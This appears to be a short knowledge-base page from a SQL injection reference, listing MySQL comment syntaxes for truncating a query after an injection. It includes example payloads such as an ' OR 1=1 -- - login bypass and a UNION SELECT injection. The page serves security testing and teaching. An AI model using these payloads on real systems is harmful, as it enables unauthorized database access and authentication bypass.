Comment Out Query

Techniques for commenting out the remainder of SQL queries in MySQL

Basics Last updated: March 15, 2025
commentsbasicsquery manipulation

The following methods can be used to comment out the rest of a query after your injection:

Comment SyntaxDescription
#Hash comment
/*C-style comment
-- -SQL comment
;%00Nullbyte
`Backtick

Examples

SELECT * FROM Users WHERE username = '' OR 1=1 -- -' AND password = '';

SELECT * FROM Users WHERE id = '' UNION SELECT 1, 2, 3`';

Notes

  • The backtick can only be used to end a query when used as an alias
Back to Knowledge Base